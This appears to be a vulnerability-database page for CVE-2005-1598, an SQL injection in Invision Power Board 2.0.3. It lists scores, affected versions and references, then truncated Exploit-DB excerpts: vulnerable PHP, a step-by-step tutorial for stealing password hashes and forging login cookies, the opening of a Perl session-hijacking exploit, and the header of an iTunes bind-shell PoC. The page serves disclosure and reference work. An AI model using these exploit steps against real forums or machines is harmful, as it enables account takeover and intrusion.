CVE-2005-1598
published 2005-05-16CVE-2005-1598: SQL injection vulnerability in Invision Power Board (IPB) 2.0.3 and earlier allows remote attackers to execute arbitrary SQL commands via a crafted cookie…
PriorityP349high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
13.91%
96.1th percentile
SQL injection vulnerability in Invision Power Board (IPB) 2.0.3 and earlier allows remote attackers to execute arbitrary SQL commands via a crafted cookie password hash (pass_hash) that modifies the internal $pid variable.
Affected
9 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| invision_power_services | invision_board | — | — |
| invision_power_services | invision_board | — | — |
| invision_power_services | invision_board | — | — |
| invision_power_services | invision_board | — | — |
| invision_power_services | invision_board | — | — |
| invision_power_services | invision_board | — | — |
| invision_power_services | invision_board | — | — |
| invision_power_services | invision_board | — | — |
| invision_power_services | invision_power_board | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Invision Power Board (IP.Board) < 2.0.3 - Multiple Vulnerabilities
exploitdb·2015-05-05·CVSS 4.3
CVE-2005-1597 [MEDIUM] Invision Power Board (IP.Board) < 2.0.3 - Multiple Vulnerabilities
Invision Power Board (IP.Board) member['id'] )
{
$mid = intval($std->my_getcookie('member_id'));
$pid = $std->my_getcookie('pass_hash');
If ($mid and $pid)
{
$DB->query("SELECT * FROM ibf_members WHERE id=$mid AND password='$pid'");
if ( $member = $DB->fetch_row() )
{
$ibforums->member = $member;
$ibforums->session_id = "";
$std->my_setcookie('session_id','0', -1 );
}
}
}
This particular portion of code is from the IPB 1.* series, but the vulnerability seems to exists on all versions of IPB (both the 1.* and 2.* series). Anyway, as we can see from the above code the variable $mid is properly forced into an integer datatype and as a result is safe to pass to the query, but what about $pid? In the above code we see that the value of $pid is returned from the my_getcookie() function with
Exploit-DB
Invision Power Board 2.0.3 - 'login.php' SQL Injection (Tutorial)
exploitdb·2005-05-27
CVE-2005-1598 Invision Power Board 2.0.3 - 'login.php' SQL Injection (Tutorial)
Invision Power Board 2.0.3 - 'login.php' SQL Injection (Tutorial)
---
# danica jones
Tutorial for the recent exploit released by Petey Beege.
1. Get the exploit from http://www.milw0rm.com/id.php?id=1013 (https://www.exploit-db.com/exploits/1013/)
2. Make sure you have LWP::UserAgent perl module if not do this:
a. perl -MCPAN -e 'shell'
b. inside the perl shell, do this 'install LWP::UserAgent'
3. Run the exploit. Get the password hash for the desired login id
ex. inv.pl http://forums.example.com 2 2
Where 2 is the login id and 2 for version 2 of IPB.
4. Open wordpad. Edit Mozilla Firefox's cookie file. Mine is located at
C:\Documents and Settings\the1\Application Data\Mozilla\Firefox\Profiles\vspyhjb9.default\cookies.txt"
Add the following entries:
forums.example.com FALSE / FAL
Exploit-DB
Invision Power Board 2.0.3 - 'login.php' SQL Injection
exploitdb·2005-05-26
CVE-2005-1598 Invision Power Board 2.0.3 - 'login.php' SQL Injection
Invision Power Board 2.0.3 - 'login.php' SQL Injection
---
#!/usr/bin/perl -w
##################################################################
# This one actually works :) Just paste the outputted cookie into
# your request header using livehttpheaders or something and you
# will probably be logged in as that user. No need to decrypt it!
# Exploit coded by "Tony Little Lately" and "Petey Beege"
##################################################################
use LWP::UserAgent;
$ua = new LWP::UserAgent;
$ua->agent("Mosiac 1.0" . $ua->agent);
if (!$ARGV[0]) {$ARGV[0] = '';}
if (!$ARGV[3]) {$ARGV[3] = '';}
my $path = $ARGV[0] . '/index.php?act=Login&CODE=autologin';
my $user = $ARGV[1]; # userid to jack
my $iver = $ARGV[2]; # version 1 or 2
my $cpre = $ARGV[3]; # cookie prefix
my $
Exploit-DB
Apple iTunes - Playlist Parsing Local Buffer Overflow
exploitdb·2005-01-16
CVE-2005-0043 Apple iTunes - Playlist Parsing Local Buffer Overflow
Apple iTunes - Playlist Parsing Local Buffer Overflow
---
/*
* PoC for iTunes on OS X 10.3.7
* -( [email protected] )-
*
* Generates a .pls file, when loaded in iTunes it
* binds a shell to port 4444.
* Shellcode contains no \x00 or \x0a's.
*
* sample output:
*
* -[nemo@gir:~]$ ./fm-eyetewnz foo.pls
* -( fm-eyetewnz )-
* -( [email protected] )-
* Creating file: foo.pls.
* Bindshell on port: 4444
* -[nemo@gir:~]$ open foo.pls
* -[nemo@gir:~]$ nc localhost 4444
* id
* uid=501(nemo) gid=501(nemo) groups=501(nemo)
*
* Thanks to andrewg, mercy and core.
* Greetings to pulltheplug and felinemenace.
*
* -( need a challenge? )-
* -( http://pulltheplug.org )-
*/
#include
#include
#define BUFSIZE 1598 + 4
char shellcode[] = /* large ugly shellcode generated by http://metasploit.com */
"
No writeups or analysis indexed.
http://forums.invisionpower.com/index.php?showtopic=168016http://marc.info/?l=bugtraq&m=111539908705851&w=2http://marc.info/?l=bugtraq&m=111712587206834&w=2http://secunia.com/advisories/15265http://securitytracker.com/id?1013907http://securitytracker.com/id?1014499http://www.gulftech.org/?node=research&article_id=00073-05052005http://www.osvdb.org/16297http://www.securiteam.com/exploits/5GP0E2KFQQ.htmlhttp://www.securityfocus.com/bid/13529https://exchange.xforce.ibmcloud.com/vulnerabilities/20446https://www.exploit-db.com/exploits/1013http://forums.invisionpower.com/index.php?showtopic=168016http://marc.info/?l=bugtraq&m=111539908705851&w=2http://marc.info/?l=bugtraq&m=111712587206834&w=2http://secunia.com/advisories/15265http://securitytracker.com/id?1013907http://securitytracker.com/id?1014499http://www.gulftech.org/?node=research&article_id=00073-05052005http://www.osvdb.org/16297http://www.securiteam.com/exploits/5GP0E2KFQQ.htmlhttp://www.securityfocus.com/bid/13529https://exchange.xforce.ibmcloud.com/vulnerabilities/20446https://www.exploit-db.com/exploits/1013
2005-05-16
Published